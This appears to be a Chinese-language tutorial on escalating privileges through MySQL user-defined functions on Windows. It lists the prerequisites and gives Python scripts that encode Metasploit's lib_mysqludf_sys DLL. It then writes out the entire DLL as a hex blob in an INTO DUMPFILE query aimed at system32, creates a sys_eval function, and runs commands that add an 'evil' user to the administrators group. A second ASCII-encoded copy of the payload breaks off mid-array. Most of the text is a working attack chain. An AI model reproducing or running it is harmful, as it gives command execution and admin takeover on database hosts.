0x01 简介

UDF(user defined function)用户自定义函数,是 mysql 的一个拓展接口。用户可以通过自定义函数实现在 mysql 中无法方便实现的功能,其添加的新函数都可以在 sql 语句中调用,就像调用本机函数一样。 由于是用户自定义的函数,所以我们可以利用 UDF 创建一个执行命令的函数。

0x02 利用条件

  • 掌握 mysql 数据库的账号,且账号有写入权限
  • mysql 对插件目录有写入权限
  • mysql < 5.0,导出路径随意
  • 5.0 <= mysql < 5.1,udf 文件需要导出至目标服务器的系统目录 (如:C:\Windows\System32)
  • mysql > 5.1,必须要把 udf 文件放到 MySQL 安装目录下的\lib\plugin目录下才能创建自定义函数

0x03 udf 文件获取

在 msf 安装目录下,有利用文件

0x04 实验环境 1

  • 系统:Windows Server 2008 R2 x64
  • 数据库:MySQL 5.0.96

4.1 利用方法

4.1.1 16进制写入

写一个 python 脚本将 lib_mysqludf_sys_64.dll 文件转化为16进制,代码如下

import binascii

with open('lib_mysqludf_sys_64.dll', 'rb') as f:
    content = f.read()
hex1 = binascii.hexlify(content)
hex = str(hex1,'utf-8')
print('0x'+hex)

转化好之后再用 sql 语句写入

# 这里只能用 into dumpfile,不能用 into outfile,因为 into outfile 函数会在行末端写入新行,更致命的是会转义换行符,这样的话这个二进制可执行文件就会被破坏
select 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000e80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000677cbfda231dd189231dd189231dd18904dbbf89211dd18904dbbc892a1dd18904dbaa89261dd189231dd0890f1dd18904dbac89211dd18904dba089221dd18904dbab89221dd18904dba989221dd18952696368231dd189000000000000000000000000000000005045000064860300a727a15a0000000000000000f00022200b020800002000000010000000800000109f000000900000000000100000000000100000000200000400000000000000050002000000000000c000000010000000000000020000000000100000000000001000000000000000001000000000000010000000000000000000001000000098b2000008020000b0b10000e800000000b00000b00100000050000050010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000800000001000000000000000040000000000000000000000000000800000e0555058310000000000200000009000000012000000040000000000000000000000000000400000e02e727372630000000010000000b000000006000000160000000000000000000000000000400000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332e393100555058210d240209e1e421439d3bdfb7de7400000f0f0000002a0000490000d41de9feff833a007450488b05a421000049890009a24008cd4973d20a9f109c1899cd9f34272096280fb70593666d83fdb7410b30b001c332c0c3cc00c215cc92c9ba810034716a6febcc16e46c096a471853fdbf1fa4631c0fb605591688401e41c7011e00ffed6dd62b8b63bf01750f3f42088338007506c64b26ebdc01017b4e2d632b05b9e4b228ce25227ed20cd26f1f28152ab001c3f66d7bc2bf83ec38344a43895c243084b7fff6dbd90b09ff15c71f2b4885c04c8bd87512104c24df6eaeb9608707202dc4388e897c242873edcdfd33c048c7c1ff0033fbf2ae1c120976d9b75b1af7d122e901890b2dcc00be6feb166f28e3026e404848deda7fdb29f938d87459488d0d40ee4e0e813832983de4c1eb81403281480a9ee4435e4f81503281543281563261f37d4fb0018c48804028c34c49467607744e61deed584917e49260680a703c6527cd18782056c740045cf8bf33b64342188b48048b008d4c010239bd1e77d27d8bd947107543706d8045ec1be936130309884370900a00b69dee10c8980a18bc0cb3c6b00e07103fbcb37ddb0f49a585c974066f5d17b7086d21cf93cf047424ada3b9772d7110448b6949e2fa02c2eddfba52e2ce0212498d5c3001e83f0ffce85cd7fddd5febcb418b03c60430d2470d5734b70c58d7e22d0822d34313167bb75bce2618007ca01cff56677c84842f7198f4cf16c64373870d087c8c03d6e4240f79561e541e511e7292939c4e1e4b1e481e63c2425e3e1e1fcf2784ee87c71f1da0981f4c89c68685ee44241824580f6c59897486bb86db76381764bdb900d34c18284cb0db7e302d4d8bf146e8e7b901ee9b6dc1ec04e00dda4533ed4488670beef69b4ff04c39290f8413050673f215fdcfb8b9169125ac1c088be8747b418d5508e1c9b6b13ac0e6cc177c7466a04b6640fa50669047fc3f42858e1b0b9529328d7936ce6f7d61c16c304375cd8cc74803c8f56636b724d470143e51c5ba08e1d9b68d39cc1ceb13225975ad886cdbb6f050eb258bc77004cd1930ddfe9cdb803e30e2154874229245ffb176d8827811fef5887edd4d174ebe5a0eebc18424805ec606e71ada0001380c4c38f12a10f8386c04c6f0a0581a87e792317fd3dc5cd8d6d09d58747a28f2023f73b773df3e448d48406e41b80010b3748bd1f10df7c7ed33c9ab441a5356104cefa2dbe6b66c02c8d8154e1b8d54b94c350aede98d054a75890ba3b16e3b2dbc3133d2c7d0208925183bdf19b7b3bad2c80df2199d30ac581e29eb081433c0922fb384f13be0064ceb0033c029001bb0dfb65538ec024510ff10c9196600fb6f7f6c900390483b0d89293f751148c1c11066f7dddd6fdfb87502f3dac1c910e9150aeccc405361203b8b7d1b5801a05fdcd25b0bfbeef7f685dbc905112fd005020675098d430185bb76efb6205b42c703d59b0d3c48b406634136670b1c5805b12006615bd85bc3cf55d27f6cc7c7c376fc608468e140dcfbf1c2c63831e83be141bdd20f8503ee46bb7408075ee428073c0f8e0d8de6b61b6e2bc58ed3105fdcfd3e76fb0fb12d602e0a741ef290b9e803c91d19bfdb36931d4275e841320783f802740fb9ef6dc3b31fb70eca0208e2ed0d2f2e338e740fd2111912f874491412fc18dadc0b1fd958f847df72165f1803b6bb2d701e4ad0c9eb081573ed12ecf6bedbcf2774192d06429bd72d0698fbfb66d833db891db80e871db906716fc7feb59806e5413bd5dde26541042530bb7dbbbd002c0978081e8bf3f048b93d883072b0b7920a63c7741ad64618d7d29b2f1c6b75e3eb037bf5a79a5ed6390c950cdaeb3fea1f9f7db7f08e8f080644892d312d1bc485c0678fed62771a15e5de0dd6181abe7fddbbeec7050725024585f67507b404bb833d14ddc96e73068b212a0b2d5c6f11dedd264fe3029cf12c66012d3a273e9e9ebe10c58f38d240e468ec98717a60dce91748c3b14d22190f6c20483a5adbf308505851f0dd05bbee77df3d041f208915d12695d275133915d709ed7f38c3750b5a17c61e83fa017405040add6be00275338931d39d08a3b71b0d34c84e20c574134ac68b07863db9d7a64bfc1616e0c9016b3c1a0edc83ffb092ebda1535ab311bc11bdb5b0bd80c430c1dc817084d7bf787755c0b1841ffd385ff88ff03753970f79d75094a08aeeb8d1ca51e36ec648b171028adeb06d8192ecc298adc25f3008bc3659e8793708b218b8bf8b59d9e2a4055bf15eaa3894d7afab61b01018b080724b0d67d5d902dd9c2302f5e7d0ab1485825ff4ddb960c1e92387d2eda02f101d7136fa3f875056c0cfcfa7d918844a4fd258b036983eb2f9e8e090cefc6f852a1899e2681ec880068cd760dbffe73153f156705b8c648f25845b7390cb8283d1f2c586170c339def61624eb754148b73dc6364238004044230430090e662fcf40280578254703055c73874c1c51494e7d4bb1077f4bf0eb222b8093447bdd837d738d0e83c00812d13e8d67db7b642a059b240d20902f9c5ba25b701c2a7214097bc009cc3e1e666c926724766e833572dbff0b70dc7a142f482c38b0bb2493827b8ef083d2396a14019b15650ccb36dc9255b624c80a271b83d76c1854ba6a234e336b1784f781c4aca041592947a626231c0fd8cf53188186d9ef0d68295a4a148a8ef8ececcdd64427cb1366eb75b908674b32d21dea902d3a1c1128106464200a8b83af334463971bcb36e418c323db83a238243d05f62809993959b611402bdc678c90c136de1bc3017f37320296247f15f4f6120d6276d81bc00383e8013c2075643f289c8d3d53041a787f4b8d1d4c068d13a08491790ec372b3326129a9ef4f137f2344720cc96681394d5a75fcb7c3ff174863513c813c0a5045e1137c0a180b020f94c063e343029f4c63413cfec9b4ebed8d7ed24c03c1413c4014450458064525ffc25f6a4ab10018741f8b510b3bd2720a8b4108ed6ff8db03c209d072104183c113c128453bcb72e16fc796b05d1cc1c3cf4cc1267af7446992e1da85dcbd1f4c2bc15feafb5abed0140ccd0f3a24c1e81f600d2cfef7d083e001eb02584fd644ab360196ebcac0b66c3008eec18b01a7ffaa128d3cc77627252205cc11ce78dca606cb113f75463da70ff0dd4603241b471eb801000000277c29847f3fe520000081bff83c3dfc32a2df2d992b7dc7f83074149d6fa3d00e7f5dc6268b2dc285586b212430bc6286b6489934e10ab9b4c856e04671d849460bb50e731c0eb110d9be10a8d813fe6a4cb84c33dbceb8ff00856037ba1623e9b8338975dde016b1df744d44d89c1d39b705dbdd8449f7d3093720d2fbdc4b4646463605dee0e2e4b24746465e505a11000055c9a8aa298064547fb017d8069017303007d04e6f206172ffffdffe67756d656e7473096c6c6f77656420287564663a206c69625f6d79730bf6b7dd716c0d5f73085f696e666f29411c80edff232076657273696f6e20302e0134ededee17a178706563744b657861076c79201a6dbb7dfb652073747243672074791b2070766175d8299b6d21724f2f7477996d60010b1f438ef6f603fb72206e616d4c436f756c246e6f74cce8b66d3b63611320186d27796372ff850740310106023532023001240d0024f6ffb7ffd407001fc408001a740b15640c0010540b000b340a0004822776bbdcfe1918090018c40f13740e640b093427b763d4ed046217d41e5e3f1903241aedbacf2c5007390f2a07801abbdc6e8367165b16743711640c340b7bd85b770442130c390c01118350118b9b6df705530133871c03e4001d5d90ed60430e057b743f09baeeb0d80401072f67079403a06077dbc10701462f462b1074092f0db6d94e3416033b01000715bb0bb6bd971574062f64f7df21000884ddb640ae043439741f00bf20eeecedb6140629034c341f0ba903e1c2debe240f05c305340a13234bd36d9b6e23431e14c45f0f470a75b713760554094b01098909a2071e7de572bb1f1e742f12640d34870142b71582bb2e1311cf0c03ca96dd0e01380f387427005124a3aafec10246ddcd5d20d266d4ff555516c900178fa02a1b003011764bd56c039180bfa007e0126dd79ddd03703407f803680b0013026a76fbba8603540b14021814170b581590fb2f07d9eeecf60a150310340727030034075bd5b9dd7003e0336f0724b3cc755dd7750b30074203ac0b9007f5b61b94db03c03233920c1903c8ba05a0eb0b10074f8be80b508375afeb077303444707990ba0b65dd77507e503280bf0073a1c033c0038b7eb0b5007f71ca70b77b63bdb8b191d2f2007381dcb40071dac7b5d83036c8307d30b601e9ded5eb3039b7c5f07c11e3be0d0ae3bdb07031f3b1007d6039c33ca1255954a005525a3aaa8aa9251645455c9d09ba0887c0402c4ff16360157616974466f7253ac7f2b40fc6c654f626abd14566972747561f63703c46c419a0d536574456e76126dbf01e26f6ee45661726961622b41eb2e40bc18437265b8546806640df65bf76d47264375727222502a636573734914e283cd1226135469636bb6fd6e03026e6b517565727950036684dedbb1f66d616e3716657218446973676fdbdbcf374c6962727879436192731a52746c633bb76d0970a2722d2c7874124cbdb5adfd6f6f6b7570463ec26916b2747279dfb5078b17cd556e77e47e4973446562736f6bed75676763a7a56583e11dfeb6b77268616e64457883704046696ca56c85c58719f19319dab61254176d65151153daf6586b39352b537973176dfa81e87517454173426509a3dbfe434388a0895f616d73675fcc6990b3850bbf5f5f435f73708b6966285f7e267cdb766f5f64116f035f706f6922430b76db2663da5f64ce280009626b31142d325f7a13c417840b5f7b50705b6c735f330a6c212205db5accd82a58096e73ed6bc982130fd76d643ed6bad6de756c343f15416d170cdea3e0020ab52689a3b565c933a196063bc16db15b0772652508661115080d5ba1739c29709f73149bb5adb93932ae6e074d0f85d7badbc56f736a663a70105e3b84ed70705831747b6d343fdf15f4c700f08c21180800e264860600a76efb0fe327a15ae6f00022200b020808120cb07744b314132e0010000005cf1e6c9b02020433050002088000c302f663146d160100022e063af76c650f0a50394330908de8db88223c1460e2d880d4bd0118020183703aacbb024b00303a011e4644a42b2e1054822d3bd810901200dc00b3dbc63b6f602e7264a76108550b53597761dd000c03162740022e26291b61f600d805100c22273616ececc02e702850eb27244fd820fc007273726300136027b3c7013226650942fca664b0702728421b4036c08d6d05ca7212d3060000000000009000ff0048894c240848895424104c8944241880fa010f854502000053565755488d35cdf0ffff488dbe0080ffff5731db31c94883cdffe85000000001db7402f3c38b1e4883eefc11db8a16f3c3488d042f83f9058a1076214883fdfc771b83e9048b104883c00483e9048917488d7f0473ef83c1048a10741048ffc0881783e9018a10488d7f0175f0f3c3fc415beb0848ffc6881748ffc78a1601db750a8b1e4883eefc11db8a1672e68d410141ffd311c001db750a8b1e4883eefc11db8a1673eb83e8037217c1e0080fb6d209d048ffc683f0ff0f843a0000004863e88d410141ffd311c941ffd311c9751889c183c00241ffd311c901db75088b1e4883eefc11db73ed4881fd00f3ffff11c1e83affffffeb835e4889f7b900120000b2004889fbeb2c8a074883c7013c80720a3c8f7706807ffe0f74062ce83c0177233817751f8b072500ffffff0fc829f801d8ab4883e9048a074883c70148ffc975d9eb0548ffc975be4883ec28488dbe007000008b0709c0744f8b5f04488d8c30b0a100004801f34883c708ff96eca1000048958a0748ffc708c074d74889f94889faffc8f2ae4889e9ff96f4a100004809c074094889034883c308ebd64883c4285d5f5e5b31c0c34883c4284883c704488d5efc31c08a0748ffc709c074233cef77114801c3488b03480fc84801f0488903ebe0240fc1e010668b074883c702ebe1488baefca10000488dbe00f0ffffbb00100000504989e141b8040000004889da4889f94883ec20ffd5488d871702000080207f8060287f4c8d4c24204d8b014889da4889f9ffd54883c4285d5f5e5b488d4424806a004839c475f94883ec804c8b442418488b542410488b4c2408e91f79ffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005cb0000054010000e404000000000000586000003c617373656d626c7920786d6c6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e763122206d616e696665737456657273696f6e3d22312e30223e0d0a20203c646570656e64656e63793e0d0a202020203c646570656e64656e74417373656d626c793e0d0a2020202020203c617373656d626c794964656e7469747920747970653d2277696e333222206e616d653d224d6963726f736f66742e564338302e435254222076657273696f6e3d22382e302e35303630382e30222070726f636573736f724172636869746563747572653d22616d64363422207075626c69634b6579546f6b656e3d2231666338623362396131653138653362223e3c2f617373656d626c794964656e746974793e0d0a202020203c2f646570656e64656e74417373656d626c793e0d0a20203c2f646570656e64656e63793e0d0a3c2f617373656d626c793e0000000000000000000000002cb20000ecb1000000000000000000000000000039b200001cb20000000000000000000000000000000000000000000044b200000000000052b200000000000062b200000000000072b200000000000080b200000000000000000000000000008eb200000000000000000000000000004b45524e454c33322e444c4c004d5356435238302e646c6c00004c6f61644c69627261727941000047657450726f634164647265737300005669727475616c50726f7465637400005669727475616c416c6c6f6300005669727475616c46726565000000667265650000000000000000a727a15a0000000074b30000010000001200000012000000c0b2000008b3000050b300007010000060100000001000008015000060100000701500002014000060100000901300000014000060100000901300003011000060100000c010000000130000e0120000a011000089b300009fb30000bcb30000d7b30000e3b30000f6b3000007b4000010b4000020b400002eb4000037b4000047b4000055b400005db400006cb4000079b4000081b4000090b4000000000100020003000400050006000700080009000a000b000c000d000e000f00100011006c69625f6d7973716c7564665f7379732e646c6c006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f62696e6576616c007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f6576616c007379735f6576616c5f6465696e6974007379735f6576616c5f696e6974007379735f65786563007379735f657865635f6465696e6974007379735f657865635f696e6974007379735f676574007379735f6765745f6465696e6974007379735f6765745f696e6974007379735f736574007379735f7365745f6465696e6974007379735f7365745f696e69740000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 into dumpfile 'C:\\WINDOWS\\system32\\lib_mysqludf_sys_64.dll';

通过 dll 文件创建函数

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys_64.dll';

查看是否创建成功

创建成功后就可以直接执行命令了,可以看到是 admin 权限

添加用户 evil,并将用户 evil 添加到管理员组

select sys_eval('net user evil Abcd1234 /add');
select sys_eval('net localgroup administrators evil /add');

查看用户是否创建成功

在目标系统中查看,可以看到,确实添加了用户 evil,并且用户 evil 在管理员组中

4.1.2 ascii 码写入

写一个 python 脚本将 lib_mysqludf_sys_64.dll 的文件内容转化为 ascii 码

import binascii
import numpy as np
import re

with open('lib_mysqludf_sys_64.dll', 'rb') as f:
    a = f.read()
asc1 = np.frombuffer(a, dtype=np.uint8)
asc = asc1.tolist()
print(asc)

转化好之后再用 sql 语句写入

# 这里只能用into dumpfile,不能用into outfile,因为into outfile函数会在行末端写入新行,更致命的是会转义换行符,这样的话这个二进制可执行文件就会被破坏
select char(77, 90, 144, 0, 3, 0, 0, 0, 4, 0, 0, 0, 255, 255, 0, 0, 184, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 232, 0, 0, 0, 14, 31, 186, 14, 0, 180, 9, 205, 33, 184, 1, 76, 205, 33, 84, 104, 105, 115, 32, 112, 114, 111, 103, 114, 97, 109, 32, 99, 97, 110, 110, 111, 116, 32, 98, 101, 32, 114, 117, 110, 32, 105, 110, 32, 68, 79, 83, 32, 109, 111, 100, 101, 46, 13, 13, 10, 36, 0, 0, 0, 0, 0, 0, 0, 103, 124, 191, 218, 35, 29, 209, 137, 35, 29, 209, 137, 35, 29, 209, 137, 4, 219, 191, 137, 33, 29, 209, 137, 4, 219, 188, 137, 42, 29, 209, 137, 4, 219, 170, 137, 38, 29, 209, 137, 35, 29, 208, 137, 15, 29, 209, 137, 4, 219, 172, 137, 33, 29, 209, 137, 4, 219, 160, 137, 34, 29, 209, 137, 4, 219, 171, 137, 34, 29, 209, 137, 4, 219, 169, 137, 34, 29, 209, 137, 82, 105, 99, 104, 35, 29, 209, 137, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 80, 69, 0, 0, 100, 134, 3, 0, 167, 39, 161, 90, 0, 0, 0, 0, 0, 0, 0, 0, 240, 0, 34, 32, 11, 2, 8, 0, 0, 32, 0, 0, 0, 16, 0, 0, 0, 128, 0, 0, 16, 159, 0, 0, 0, 144, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 16, 0, 0, 0, 2, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 5, 0, 2, 0, 0, 0, 0, 0, 0, 192, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 152, 178, 0, 0, 8, 2, 0, 0, 176, 177, 0, 0, 232, 0, 0, 0, 0, 176, 0, 0, 176, 1, 0, 0, 0, 80, 0, 0, 80, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 85, 80, 88, 48, 0, 0, 0, 0, 0, 128, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 0, 0, 224, 85, 80, 88, 49, 0, 0, 0, 0, 0, 32, 0, 0, 0, 144, 0, 0, 0, 18, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 224, 46, 114, 115, 114, 99, 0, 0, 0, 0, 16, 0, 0, 0, 176, 0, 0, 0, 6, 0, 0, 0, 22, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 192, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 51, 46, 57, 49, 0, 85, 80, 88, 33, 13, 36, 2, 9, 225, 228, 33, 67, 157, 59, 223, 183, 222, 116, 0, 0, 15, 15, 0, 0, 0, 42, 0, 0, 73, 0, 0, 212, 29, 233, 254, 255, 131, 58, 0, 116, 80, 72, 139, 5, 164, 33, 0, 0, 73, 137, 0, 9, 162, 64, 8, 205, 73, 115, 210, 10, 159, 16, 156, 24, 153, 205, 159, 52, 39, 32, 150, 40, 15, 183, 5, 147, 102, 109, 131, 253, 183, 65, 11, 48, 176, 1, 195, 50, 192, 195, 204, 0, 194, 21, 204, 146, 201, 186, 129, 0, 52, 113, 106, 111, 235, 204, 22, 228, 108, 9, 106, 71, 24, 83, 253, 191, 31, 164, 99, 28, 15, 182, 5, 89, 22, 136, 64, 30, 65, 199, 1, 30, 0, 255, 237, 109, 214, 43, 139, 99, 191, 1, 117, 15, 63, 66, 8, 131, 56, 0, 117, 6, 198, 75, 38, 235, 220, 1, 1, 123, 78, 45, 99, 43, 5, 185, 228, 178, 40, 206, 37, 34, 126, 210, 12, 210, 111, 31, 40, 21, 42, 176, 1, 195, 246, 109, 123, 194, 191, 131, 236, 56, 52, 74, 67, 137, 92, 36, 48, 132, 183, 255, 246, 219, 217, 11, 9, 255, 21, 199, 31, 43, 72, 133, 192, 76, 139, 216, 117, 18, 16, 76, 36, 223, 110, 174, 185, 96, 135, 7, 32, 45, 196, 56, 142, 137, 124, 36, 40, 115, 237, 205, 253, 51, 192, 72, 199, 193, 255, 0, 51, 251, 242, 174, 28, 18, 9, 118, 217, 183, 91, 26, 247, 209, 34, 233, 1, 137, 11, 45, 204, 0, 190, 111, 235, 22, 111, 40, 227, 2, 110, 64, 72, 72, 222, 218, 127, 219, 41, 249, 56, 216, 116, 89, 72, 141, 13, 64, 238, 78, 14, 129, 56, 50, 152, 61, 228, 193, 235, 129, 64, 50, 129, 72, 10, 158, 228, 67, 94, 79, 129, 80, 50, 129, 84, 50, 129, 86, 50, 97, 243, 125, 79, 176, 1, 140, 72, 128, 64, 40, 195, 76, 73, 70, 118, 7, 116, 78, 97, 222, 237, 88, 73, 23, 228, 146, 96, 104, 10, 112, 60, 101, 39, 205, 24, 120, 32, 86, 199, 64, 4, 92, 248, 191, 51, 182, 67, 66, 24, 139, 72, 4, 139, 0, 141, 76, 1, 2, 57, 189, 30, 119, 210, 125, 139, 217, 71, 16, 117, 67, 112, 109, 128, 69, 236, 27, 233, 54, 19, 3, 9, 136, 67, 112, 144, 10, 0, 182, 157, 238, 16, 200, 152, 10, 24, 188, 12, 179, 198, 176, 14, 7, 16, 63, 188, 179, 125, 219, 15, 73, 165, 133, 201, 116, 6, 111, 93, 23, 183, 8, 109, 33, 207, 147, 207, 4, 116, 36, 173, 163, 185, 119, 45, 113, 16, 68, 139, 105, 73, 226, 250, 2, 194, 237, 223, 186, 82, 226, 206, 2, 18, 73, 141, 92, 48, 1, 232, 63, 15, 252, 232, 92, 215, 253, 221, 95, 235, 203, 65, 139, 3, 198, 4, 48, 210, 71, 13, 87, 52, 183, 12, 88, 215, 226, 45, 8, 34, 211, 67, 19, 22, 123, 183, 91, 206, 38, 24, 0, 124, 160, 28, 255, 86, 103, 124, 132, 132, 47, 113, 152, 244, 207, 22, 198, 67, 115, 135, 13, 8, 124, 140, 3, 214, 228, 36, 15, 121, 86, 30, 84, 30, 81, 30, 114, 146, 147, 156, 78, 30, 75, 30, 72, 30, 99, 194, 66, 94, 62, 30, 31, 207, 39, 132, 238, 135, 199, 31, 29, 160, 152, 31, 76, 137, 198, 134, 133, 238, 68, 36, 24, 36, 88, 15, 108, 89, 137, 116, 134, 187, 134, 219, 118, 56, 23, 100, 189, 185, 0, 211, 76, 24, 40, 76, 176, 219, 126, 48, 45, 77, 139, 241, 70, 232, 231, 185, 1, 238, 155, 109, 193, 236, 4, 224, 13, 218, 69, 51, 237, 68, 136, 103, 11, 238, 246, 155, 79, 240, 76, 57, 41, 15, 132, 19, 5, 6, 115, 242, 21, 253, 207, 184, 185, 22, 145, 37, 172, 28, 8, 139, 232, 116, 123, 65, 141, 85, 8, 225, 201, 182, 177, 58, 192, 230, 204, 23, 124, 116, 102, 160, 75, 102, 64, 250, 80, 102, 144, 71, 252, 63, 66, 133, 142, 27, 11, 149, 41, 50, 141, 121, 54, 206, 111, 125, 97, 193, 108, 48, 67, 117, 205, 140, 199, 72, 3, 200, 245, 102, 54, 183, 36, 212, 112, 20, 62, 81, 197, 186, 8, 225, 217, 182, 141, 57, 204, 28, 235, 19, 34, 89, 117, 173, 136, 108, 219, 182, 240, 80, 235, 37, 139, 199, 112, 4, 205, 25, 48, 221, 254, 156, 219, 128, 62, 48, 226, 21, 72, 116, 34, 146, 69, 255, 177, 118, 216, 130, 120, 17, 254, 245, 136, 126, 221, 77, 23, 78, 190, 90, 14, 235, 193, 132, 36, 128, 94, 198, 6, 231, 26, 218, 0, 1, 56, 12, 76, 56, 241, 42, 16, 248, 56, 108, 4, 198, 240, 160, 88, 26, 135, 231, 146, 49, 127, 211, 220, 92, 216, 214, 208, 157, 88, 116, 122, 40, 242, 2, 63, 115, 183, 115, 223, 62, 68, 141, 72, 64, 110, 65, 184, 0, 16, 179, 116, 139, 209, 241, 13, 247, 199, 237, 51, 201, 171, 68, 26, 83, 86, 16, 76, 239, 162, 219, 230, 182, 108, 2, 200, 216, 21, 78, 27, 141, 84, 185, 76, 53, 10, 237, 233, 141, 5, 74, 117, 137, 11, 163, 177, 110, 59, 45, 188, 49, 51, 210, 199, 208, 32, 137, 37, 24, 59, 223, 25, 183, 179, 186, 210, 200, 13, 242, 25, 157, 48, 172, 88, 30, 41, 235, 8, 20, 51, 192, 146, 47, 179, 132, 241, 59, 224, 6, 76, 235, 0, 51, 192, 41, 0, 27, 176, 223, 182, 85, 56, 236, 2, 69, 16, 255, 16, 201, 25, 102, 0, 251, 111, 127, 108, 144, 3, 144, 72, 59, 13, 137, 41, 63, 117, 17, 72, 193, 193, 16, 102, 247, 221, 221, 111, 223, 184, 117, 2, 243, 218, 193, 201, 16, 233, 21, 10, 236, 204, 64, 83, 97, 32, 59, 139, 125, 27, 88, 1, 160, 95, 220, 210, 91, 11, 251, 238, 247, 246, 133, 219, 201, 5, 17, 47, 208, 5, 2, 6, 117, 9, 141, 67, 1, 133, 187, 118, 239, 182, 32, 91, 66, 199, 3, 213, 155, 13, 60, 72, 180, 6, 99, 65, 54, 103, 11, 28, 88, 5, 177, 32, 6, 97, 91, 216, 91, 195, 207, 85, 210, 127, 108, 199, 199, 195, 118, 252, 96, 132, 104, 225, 64, 220, 251, 241, 194, 198, 56, 49, 232, 59, 225, 65, 